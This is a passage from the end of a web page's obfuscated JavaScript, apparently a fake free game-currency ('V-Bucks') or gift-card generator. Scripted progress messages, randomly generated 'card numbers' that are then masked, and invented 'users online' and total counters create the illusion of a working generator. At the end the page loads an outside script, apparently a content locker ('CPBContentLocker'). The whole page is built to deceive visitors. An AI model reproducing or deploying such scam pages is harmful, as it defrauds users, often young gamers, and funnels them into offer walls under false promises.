_0xdf3b12=_0x3795f6;document[_0xdf3b12(0x71)]('main4')[_0xdf3b12(0x98)]['display']=_0xdf3b12(0x89),setTimeout(function(){var _0x2cf0a4=_0xdf3b12;document['getElementById'](_0x2cf0a4(0x82))[_0x2cf0a4(0x98)][_0x2cf0a4(0x7b)]='none',document[_0x2cf0a4(0x71)](_0x2cf0a4(0x97))[_0x2cf0a4(0x98)]['display']=_0x2cf0a4(0x90),document[_0x2cf0a4(0x71)](_0x2cf0a4(0x8e))['innerHTML']=vbucksValue;},0x64);},0xbb8);},0xdac);},0xfa0);},0x1450);},0x1388);},0xfa0);},0x3e8);}function generatecode(_0x3476fd){var _0x579510=_0x1c9df6;document[_0x579510(0x71)](_0x579510(0x84))[_0x579510(0x98)]['display']='none',document[_0x579510(0x71)](_0x579510(0x94))[_0x579510(0x98)][_0x579510(0x7b)]=_0x579510(0x90);var _0x5d2d9d=setInterval(_0x5d008c,0x64),_0x2fc32e=0x0,_0x21d8cd=['9','8','7','6','5','4','3','2','1','0'];function _0x5d008c(){var _0x2642f2=_0x579510;key1=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key2=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key3=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key4=_0x21d8cd[Math[_0x2642f2(0x72)](Math['random']()*0xa)],key5=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key6=_0x21d8cd[Math['floor'](Math[_0x2642f2(0x6f)]()*0xa)],key7=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key8=_0x21d8cd[Math['floor'](Math['random']()*0xa)],key9=_0x21d8cd[Math['floor'](Math[_0x2642f2(0x6f)]()*0xa)],key10=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key11=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key12=_0x21d8cd[Math['floor'](Math[_0x2642f2(0x6f)]()*0xa)],key13=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key14=_0x21d8cd[Math['floor'](Math['random']()*0xa)],key15=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],key16=_0x21d8cd[Math[_0x2642f2(0x72)](Math[_0x2642f2(0x6f)]()*0xa)],_0x2fc32e<=0x32?(document['getElementById']('codegf')[_0x2642f2(0x87)]=key1+key2+key3+key4+'-'+key5+key6+key7+key8+'-'+key9+key10+key11+key12+'-'+key13+key14+key15+key16,_0x2fc32e++):(document[_0x2642f2(0x71)]('codegf')[_0x2642f2(0x87)]=_0x2642f2(0x85)+_0x2642f2(0x85)+_0x2642f2(0x85)+key13+key14+key15+key16,document['getElementById'](_0x2642f2(0x8f))[_0x2642f2(0x87)]=_0x2642f2(0x85)+'XXXX-'+_0x2642f2(0x85)+key13+key14+key15+key16,clearInterval(_0x5d2d9d));}}function next(_0x3c2944){var _0x554b64=_0x1c9df6;document['getElementById']('main2')['style'][_0x554b64(0x7b)]=_0x554b64(0x89),document[_0x554b64(0x71)]('main0')['style'][_0x554b64(0x7b)]=_0x554b64(0x90);if(_0x3c2944==0x1)vbucksValue=0x14;else{if(_0x3c2944==0x2)vbucksValue=0x32;else _0x3c2944==0x3&&(vbucksValue=0x64);}}UserOnline();var interval=setInterval(UserOnline,0x7d0);function UserOnline(){var _0x13c24c=_0x1c9df6;document[_0x13c24c(0x71)]('users-online')[_0x13c24c(0x87)]=Math[_0x13c24c(0x72)](Math['random']()*0x32)+0x168;}function _0x2f65(){var _0x4627ed=['Card\x20Number\x20Found!','main4','Generating-step0','progressbar85','btn1id','main0','input-id','18PpqYQF','random','classList','getElementById','floor','We\x27re\x20generating\x20your\x20reward','add','12652AcqlDa','320089eIopQv','157310LHnubg','progressbar25','604329raKZzn','Finalizing...','display','Loading\x20last\x20step..','6191248YMzXZK','progressbar40','getFullYear','getDate','5508720HUqNiS','mainimg','slice','settings-rotate','XXXX-','progressbar65','innerHTML','Looking\x20for\x20unused\x20card\x20numbers..','none','update','.mail-error','87aNcrGs','500HJemzZ','vbucksamount','code','block','progress-bar','6IvSQYQ','querySelector','firststep','total','1040256ylhQMe','main3','style'];_0x2f65=function(){return _0x4627ed;};return _0x2f65();}var mydate=new Date(),date=mydate[_0x1c9df6(0x7f)]()+'/'+('0'+(mydate['getMonth']()+0x1))[_0x1c9df6(0x83)](-0x2)+'/'+('0'+mydate[_0x1c9df6(0x80)]())['slice'](-0x2);function _0x2f99(_0x4bba22,_0x33a46e){var _0x2f65bf=_0x2f65();return _0x2f99=function(_0x2f99ed,_0x67296c){_0x2f99ed=_0x2f99ed-0x6b;var _0x85e118=_0x2f65bf[_0x2f99ed];return _0x85e118;},_0x2f99(_0x4bba22,_0x33a46e);}document['getElementById'](_0x1c9df6(0x8a))[_0x1c9df6(0x87)]=date,setInterval(total,0x1388);var incrementvalue=Math[_0x1c9df6(0x72)](Math[_0x1c9df6(0x6f)]()*0x32)+0x334;document[_0x1c9df6(0x71)](_0x1c9df6(0x95))[_0x1c9df6(0x87)]=incrementvalue;function total(){var _0x40fe29=_0x1c9df6;incrementvalue+=Math[_0x40fe29(0x72)](Math[_0x40fe29(0x6f)]()*0x14),document[_0x40fe29(0x71)](_0x40fe29(0x95))['innerHTML']=incrementvalue;}
</script>
</body>
</html>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var JQimn_OuL_TUxoTc={"it":4263893,"key":"49369"};
</script>
<script src="https://d1mikxzr3lp4va.cloudfront.net/c0349b3.js"></script>
<script>

</script>
<script type="text/javascript">
    $(document).ready(function(){
	//Javascript Here

});
</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA--2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
